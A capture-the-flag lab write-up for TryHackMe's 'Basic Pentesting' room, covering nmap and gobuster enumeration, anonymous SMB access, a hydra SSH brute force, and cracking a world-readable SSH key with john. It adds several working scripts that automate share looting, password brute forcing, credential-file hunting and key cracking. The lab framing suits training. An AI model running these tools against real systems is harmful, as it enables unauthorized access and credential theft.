TryHackMe: Basic Pentesting

Basic Pentesting is a room that you don’t need months of cybersecurity experience to complete; a little knowledge is enough, and the research is easy too. I’m still falling into some rabbit holes but getting better. I’m trying my best to keep myself out of walkthroughs and it’s going well, I only peek for little things, but I still have a long way ahead of me, a lot to learn and master… just getting started!

Room https://tryhackme.com/r/room/basicpentestingjt

Initial Enumeration

Nmap Scan

We start by enumerating the network:

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn 10.10.141.249
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-09 19:11 WET
Nmap scan report for 10.10.141.249
Host is up (0.092s latency).
Not shown: 994 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|   256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_  256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13?
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open  http-proxy
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2025-01-09T14:14:03-05:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 1h40m00s, deviation: 2h53m13s, median: 0s
| smb2-time: 
|   date: 2025-01-09T19:14:02
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.82 seconds

Based on the nmap scan we see the following ports open:

  • 22/SSH (OpenSSH 7.2p2, Ubuntu 16.04)
  • 80/HTTP (Apache 2.4.18)
  • 139, 445/SMB (Samba 4.3.11-Ubuntu)
  • 8009/AJP13 (Tomcat’s connector port; the nmap service probe couldn’t get a valid response)
  • 8080/HTTP (Apache Tomcat, detected from the favicon)

Two details in the host-script output are worth noting for later: the SMB probe ran with account_used: guest, so the server is already accepting unauthenticated sessions, and SMB message signing is "enabled but not required".

Web 80

We will start by visiting port 80, which gives us an ‘undergoing maintenance’ message:

Port 80 Page

Port 8080 takes a very long time to load and only shows the Apache Tomcat default page:

Port 8080 Page

Gobuster Scan

Since there isn’t much to find on either page, the next step is directory brute-forcing with gobuster. Running gobuster against port 8080 fails with client timeouts, so we can only run it against port 80:

┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ".html,.txt,.php" -t 25 --timeout 20s -u http://10.10.141.249:80
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.141.249:80
[+] Method:                  GET
[+] Threads:                 25
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php
[+] Timeout:                 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 158]
/.html                (Status: 403) [Size: 293]
/development          (Status: 301) [Size: 320] [--> http://10.10.141.249/development/]
/server-status        (Status: 403) [Size: 301]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

Most of the scans in this room take quite a while. It’s better to start with a lean scan (few or no options, no scripts) and only fall back to the heavier, more detailed scans if nothing useful turns up; the same applies to nmap, where a full-port sweep without -sC -sV is much faster than the scripted scan above.
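As an added example (not part of the original write-up), this is how I would turn that advice into a two-stage nmap run: a fast sweep of all 65535 TCP ports with no probes, then -sC -sV only on the ports the sweep found open. It assumes nmap is installed and that the target is the room’s box; open_ports_from_greppable parses nmap’s -oG output so the stage-2 port list never has to be typed by hand.

```shell
#!/bin/sh
# Added example, not code from the original post.
# Stage 1: fast full-port sweep, no scripts, no version probes.
# Stage 2: -sC -sV only on the ports stage 1 found open.
# Assumptions: nmap installed; target is the room's machine.

# Extract the open TCP ports from nmap's grepable (-oG) output as a
# comma-separated, de-duplicated, numerically sorted list, e.g. "22,80,139,445".
# Filtered/closed ports are ignored, so 8009 would only appear if it is open.
open_ports_from_greppable() {
    # $1: path to a file written with -oG
    grep '^Host:' "$1" \
      | grep -o '[0-9]*/open/tcp' \
      | cut -d/ -f1 \
      | sort -n -u \
      | paste -s -d ',' -
}

staged_scan() {
    target="$1"
    gnmap="${TMPDIR:-/tmp}/sweep.$$.gnmap"
    # Stage 1: all ports, no DNS (-n), no ping (-Pn), grepable output only.
    nmap -p- -T4 -n -Pn --min-rate 1000 -oG "$gnmap" "$target" >/dev/null
    ports=$(open_ports_from_greppable "$gnmap")
    rm -f "$gnmap"
    [ -n "$ports" ] || { echo "[-] no open TCP ports found" >&2; return 1; }
    echo "[+] open ports: $ports"
    # Stage 2: the slow default scripts and version probes, only where needed.
    nmap -p "$ports" -T4 -n -Pn -sC -sV "$target"
}

# Usage: staged_scan 10.10.141.249
```

The --min-rate 1000 is what makes the first stage fast; on a laggy VPN link like this room’s (90 ms latency) you may need to lower it if the sweep starts reporting everything as filtered.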

From the scan we see a new directory called development, and when visiting it we see the following:

Development page

Two text files, dev.txt and j.txt, that when read give us the following:

Dev Text

J Text

The notes confirm that SMB has been set up on this box (the 2.5.12 version string in dev.txt belongs to the Apache Struts install the note talks about, not to Samba; nmap already fingerprinted Samba as 4.3.11-Ubuntu). Before looking for any exploits, we should enumerate SMB first.

SMB

Without going too much in depth, enumerating SMB here is simple: list the shares and connect to the one that allows a null (anonymous) session, which in this case is the intended path. Pressing Enter at the password prompt is what makes it a null session:

┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient //10.10.141.249/Anonymous
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> 

A simple ls shows a single file, staff.txt, which we download with the get command and read locally:

smb: \> ls
  .                                   D        0  Thu Apr 19 18:31:20 2018
  ..                                  D        0  Thu Apr 19 18:13:06 2018
  staff.txt                           N      173  Thu Apr 19 18:29:55 2018

                14318640 blocks of size 1024. 10822620 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \> 
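The interactive session above is fine for one share with one file, but on a real engagement you want the share list and every readable file pulled down non-interactively so nothing is missed. The following is an added example (not code from the original post) that does exactly that with smbclient’s -N (null session) and -c (scripted commands) options; disk_shares_from_listing parses the table printed by smbclient -L, skipping the administrative IPC$ share. It assumes the Samba client tools are installed and the target is the room’s box.

```shell
#!/bin/sh
# Added example, not code from the original post.
# Enumerate SMB shares over a null session and mirror every readable
# disk share to ./loot/<share>/ without an interactive prompt.
# Assumptions: smbclient (Samba suite) installed; target is the room's box.

# Parse the share table printed by `smbclient -L HOST -N`:
#     Sharename   Type   Comment
#     ---------   ----   -------
#     Anonymous   Disk
#     IPC$        IPC    IPC Service (...)
# Keep only Disk shares and drop IPC$.
disk_shares_from_listing() {
    # $1: file holding the smbclient -L output
    awk '
      /^[[:space:]]*Sharename/                   { in_table = 1; next }
      in_table && /^[[:space:]]*---/             { next }
      in_table && NF == 0                        { in_table = 0 }
      in_table && $2 == "Disk" && $1 != "IPC$"   { print $1 }
    ' "$1"
}

loot_shares() {
    host="$1"
    out="${2:-loot}"
    listing="${TMPDIR:-/tmp}/shares.$$"
    # -N: do not prompt for a password, i.e. attempt a null session.
    smbclient -L "$host" -N > "$listing" 2>&1
    shares=$(disk_shares_from_listing "$listing")
    if [ -z "$shares" ]; then
        echo "[-] no disk shares visible anonymously:" >&2
        cat "$listing" >&2
        rm -f "$listing"
        return 1
    fi
    rm -f "$listing"
    for share in $shares; do
        mkdir -p "$out/$share"
        echo "[+] mirroring //$host/$share -> $out/$share"
        # recurse and prompt are toggles: turn recursion on, prompting off,
        # change the local directory, then fetch everything.
        smbclient "//$host/$share" -N \
            -c "recurse; prompt; lcd $out/$share; mget *" \
            || echo "[-] $share: could not read share" >&2
    done
}

# Usage: loot_shares 10.10.141.249
```

After it runs, grep the loot directory for usernames, passwords and keys before touching anything else; staff.txt in this room would have surfaced the same way.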

Opening staff.txt gives us two possible usernames, Jan and Kay:

Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

Brute forcing SSH

With two usernames we can try to brute-force SSH and get a shell on the machine. The j.txt note from port 80 says that "J"’s password was cracked easily, so we try jan first: that hint matters, because a blind run of all of rockyou against SSH is not realistic (hydra’s own estimate below is ~14 million attempts at a few hundred per minute).

To do so we use hydra against the SSH service:

┌──(kali㉿kali)-[~/Desktop]
└─$ hydra -t 64 -l jan 10.10.141.249 ssh -P /usr/share/wordlists/rockyou.txt
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-09 19:43:16

[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://10.10.141.249:22/
[STATUS] 674.00 tries/min, 480 tries in 00:01h, 14343772 to do in 354:42h, 17 active
[22][ssh] host: 10.10.141.249   login: jan   password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-09 19:45:44
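Two things are worth checking before (and while) throwing hydra at sshd: whether the server even offers password authentication for that user, and how many parallel connections it will tolerate. The following is an added example (not code from the original post) that asks sshd for its accepted methods by offering none, and only then runs hydra with the task count hydra itself recommends for SSH. It assumes the OpenSSH client and hydra are installed, that the wordlist lives at Kali’s rockyou.txt path, and that the user and host are the room’s jan and 10.10.141.249.

```shell
#!/bin/sh
# Added example, not code from the original post.
# 1. Ask sshd which authentication methods it accepts for a user.
# 2. Brute-force with hydra only if password auth is actually offered.
# Assumptions: OpenSSH client + hydra installed; rockyou.txt at Kali's path.

# Offer no authentication at all; the client then prints the server's
# list, e.g. "jan@10.10.141.249: Permission denied (publickey,password)."
offered_auth_methods() {
    # $1: user   $2: host
    ssh -o BatchMode=yes -o PreferredAuthentications=none \
        -o StrictHostKeyChecking=no -o ConnectTimeout=10 \
        "$1@$2" 2>&1 | auth_methods_from_banner
}

# Pull the comma-separated method list out of that line (empty if absent,
# e.g. when the connection timed out or was refused).
auth_methods_from_banner() {
    sed -n 's/.*Permission denied (\([^)]*\)).*/\1/p' | head -n 1
}

# Password guessing only works through "password" or "keyboard-interactive".
password_auth_enabled() {
    # $1: method list such as "publickey,password"
    case ",$1," in
        *,password,*|*,keyboard-interactive,*) return 0 ;;
        *) return 1 ;;
    esac
}

brute_ssh() {
    user="$1"; host="$2"
    methods=$(offered_auth_methods "$user" "$host")
    if ! password_auth_enabled "$methods"; then
        echo "[-] sshd offers only '${methods:-nothing}' for $user; brute force is pointless" >&2
        return 1
    fi
    # -t 4: hydra warns that most sshd configurations cap parallel sessions
    #       (MaxStartups) and recommends -t 4; more tasks just produce errors.
    # -f: stop after the first valid pair.  -I: skip the restore-file prompt.
    hydra -I -f -t 4 -l "$user" -P /usr/share/wordlists/rockyou.txt "ssh://$host"
}

# Usage: brute_ssh jan 10.10.141.249
```

Note the -t 64 in the run above: hydra prints a warning recommending -t 4 for SSH, and the status line shows only 17 of the 64 tasks actually active, which is sshd’s connection limit biting. The "timeout" errors the write-up hits against kay further down are most likely the same limit, not anything specific to that account.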

We found jan’s password within a couple of minutes, far sooner than the 354-hour estimate, because it sits early in rockyou. Trying to brute-force kay the same way only gives us timeout errors, so our only option really is to log in as jan:

jan@basic2:~$ whoami
jan

Now that we are in, it’s just a matter of exploring the machine for anything that lets us move further.

Reading /etc/passwd we see two users with home directories, jan and kay, and those are a good place to start looking for useful files. jan’s home has nothing but a .lesshst we can’t even read:

jan@basic2:/$ ls -la home/jan
total 12
drwxr-xr-x 2 root root 4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 root jan    47 Apr 23  2018 .lesshst

In kay’s home directory, though, there is a pass.bak, but it is mode 600 and owned by kay, so jan cannot read it:

jan@basic2:/$ ls -la home/kay
total 48
drwxr-xr-x 5 kay  kay  4096 Apr 23  2018 .
drwxr-xr-x 4 root root 4096 Apr 19  2018 ..
-rw------- 1 kay  kay   756 Apr 23  2018 .bash_history
-rw-r--r-- 1 kay  kay   220 Apr 17  2018 .bash_logout
-rw-r--r-- 1 kay  kay  3771 Apr 17  2018 .bashrc
drwx------ 2 kay  kay  4096 Apr 17  2018 .cache
-rw------- 1 root kay   119 Apr 23  2018 .lesshst
drwxrwxr-x 2 kay  kay  4096 Apr 23  2018 .nano
-rw------- 1 kay  kay    57 Apr 23  2018 pass.bak
-rw-r--r-- 1 kay  kay   655 Apr 17  2018 .profile
drwxr-xr-x 2 kay  kay  4096 Apr 23  2018 .ssh
-rw-r--r-- 1 kay  kay     0 Apr 17  2018 .sudo_as_admin_successful
-rw------- 1 root kay   538 Apr 23  2018 .viminfo
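Walking each home directory with ls -la works on a box with two users, but it does not scale and it is easy to miss a file. What I actually want from a foothold shell is one sweep that lists every file other accounts can read and that looks like a credential: keys, backups, histories. The following is an added example (not code from the original post); it assumes a Linux target with GNU findutils, as on this Ubuntu box, and is run as the low-privilege user. Because it tests the mode bits (-perm -004) rather than whether the current user happens to be able to read the file, it reports the same thing whether you run it as jan or as root during a review.

```shell
#!/bin/sh
# Added example, not code from the original post.
# Sweep a directory tree for files that are readable by "other" and
# look like credentials or backups, the way kay's id_rsa is on this box.
# Assumptions: Linux with GNU find; run from the foothold shell.

# Regular files under $1 with the world-readable bit set whose names
# suggest keys, backups or shell history. Errors (unreadable dirs) are hidden.
find_readable_loot() {
    # $1: root to search, e.g. /home
    find "$1" -type f -perm -004 \
        \( -name 'id_*' -o -name '*.bak' -o -name '*.old' \
           -o -name '*history' -o -name '*.pem' -o -name '*.key' \) \
        2>/dev/null | sort
}

# Independently of the file name, flag any world-readable file that
# contains a PEM private-key marker. A key readable by everyone is a
# credential for everyone, which is the real finding in kay's .ssh.
world_readable_private_keys() {
    find "$1" -type f -perm -004 \
        -exec grep -l 'PRIVATE KEY-----' {} + 2>/dev/null | sort
}

# Usage from the jan shell:
#   find_readable_loot /home
#   world_readable_private_keys /home
```

On this machine the first call would list /home/kay/.ssh/id_rsa and id_rsa.pub (the .bash_history and pass.bak are 600 and correctly stay out), and the second narrows it down to the private key.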

.bak files are backups, and given the name "pass" it’s safe to assume it is a password backup, so our goal is to become kay and read it.

We also see a .ssh directory that every user can read, and inside it a file called id_rsa, a private key that can be used to log in as kay without a password. Conveniently it is world-readable too (mode 644), which is the real misconfiguration here: a private key is only as secret as the least-privileged account that can read it:

jan@basic2:/home/kay/.ssh$ ls -la
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23  2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23  2018 ..
-rw-rw-r-- 1 kay kay  771 Apr 23  2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19  2018 id_rsa
-rw-r--r-- 1 kay kay  771 Apr 19  2018 id_rsa.pub

Logging into ssh with id_rsa key

We can now read the id_rsa file and copy its content into a new file on our own machine (since jan’s password is known, scp jan@10.10.141.249:/home/kay/.ssh/id_rsa . would also work and avoids copy/paste damage to long lines):

┌──(kali㉿kali)-[~/Desktop]
└─$ echo '[REDACTED]' > id_rsa
                                                                                                                     
┌──(kali㉿kali)-[~/Desktop]
└─$ chmod 600 id_rsa

The file mode matters: if the key is readable by group or others, ssh prints "Permissions 0644 for 'id_rsa' are too open" and ignores it, so it has to be 600 (or 400).

Cracking id_rsa password

If we try to log in as kay now, ssh asks for the key’s passphrase:

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i id_rsa kay@10.10.141.249
Enter passphrase for key 'id_rsa': 

To get around this we use ssh2john, which converts the encrypted key into a hash that the normal john command can crack:

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh2john id_rsa > hash
┌──(kali㉿kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash        
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]          (id_rsa)     
1g 0:00:00:00 DONE (2025-01-09 22:34) 6.250g/s 517200p/s 517200c/s 517200C/s behlat..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
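The copy-the-key, fix-the-mode, then ssh2john sequence above is worth scripting, mainly so the cracking step only runs when the key is actually encrypted and so the mode is never forgotten. The following is an added example (not code from the original post) that fetches a key with scp, classifies it as a legacy PEM or current "openssh-key-v1" file with or without encryption by looking at the headers (and, for the new format, at the cipher name inside the base64 container), and only then calls ssh2john and john. It assumes the OpenSSH client, coreutils base64 and john with ssh2john on the attacking box, jan’s password for the scp step, and Kali’s rockyou.txt path.

```shell
#!/bin/sh
# Added example, not code from the original post.
# Fetch a stolen private key intact, set the mode ssh insists on, and
# decide whether it needs a passphrase crack before spending time on john.
# Assumptions: OpenSSH client, coreutils base64, john + ssh2john installed;
# jan's password known for scp; rockyou.txt at Kali's path.

# scp instead of copy/paste from a terminal: pasting mangles long lines.
fetch_key() {
    # $1: user@host   $2: remote path   $3: local path
    scp -q "$1:$2" "$3" && chmod 600 "$3"
}

# Classify a private key file:
#   legacy-encrypted  PEM with "Proc-Type: 4,ENCRYPTED" (MD5-based KDF,
#                     one iteration: this is why john above ran at ~500k/s)
#   legacy-plain      PEM without a passphrase
#   openssh-encrypted new container with a real cipher (bcrypt KDF: slow to crack)
#   openssh-plain     new container with ciphername "none"
ssh_key_kind() {
    if grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
        echo legacy-encrypted
    elif grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1"; then
        # Binary layout: "openssh-key-v1\0" (15 bytes), uint32 length (4 bytes),
        # then the cipher name; so the name starts at byte 20.
        cipher=$(sed '/-----/d' "$1" | tr -d '\n' | base64 -d 2>/dev/null \
                 | tail -c +20 | head -c 4)
        if [ "$cipher" = "none" ]; then echo openssh-plain; else echo openssh-encrypted; fi
    elif grep -q 'PRIVATE KEY-----' "$1"; then
        echo legacy-plain
    else
        echo unknown
    fi
}

# Crack only when there is something to crack.
crack_if_needed() {
    # $1: local key path
    case "$(ssh_key_kind "$1")" in
        *-encrypted)
            ssh2john "$1" > "$1.hash"
            john --wordlist=/usr/share/wordlists/rockyou.txt "$1.hash"
            john --show "$1.hash" ;;
        *-plain)
            echo "[+] $1 has no passphrase, use it directly with ssh -i" ;;
        *)
            echo "[-] $1 does not look like a private key" >&2; return 1 ;;
    esac
}

# Usage:
#   fetch_key jan@10.10.141.249 /home/kay/.ssh/id_rsa ./kay_id_rsa
#   crack_if_needed ./kay_id_rsa
```

The classification is what explains the john output above: "Cost 1 (KDF/cipher ...) is 0" means a legacy PEM key, whose passphrase is stretched with a single MD5 pass, so rockyou falls in under a second; a key generated by a current ssh-keygen uses the bcrypt KDF and the same run would take orders of magnitude longer.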

We get the passphrase almost instantly (the "Cost 1 ... is 0" line tells us why: a legacy PEM key with a single-iteration MD5 KDF, so rockyou flies through at half a million candidates per second). All we have to do now is log in as kay with the key and that passphrase:

┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i id_rsa kay@10.10.141.249
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Thu Jan  9 17:38:41 2025 from [REDACTED]
kay@basic2:~$ 

And for the last flag we just read pass.bak:

kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
[REDACTED]
kay@basic2:~$ 

This post is licensed under CC BY 4.0 by the author.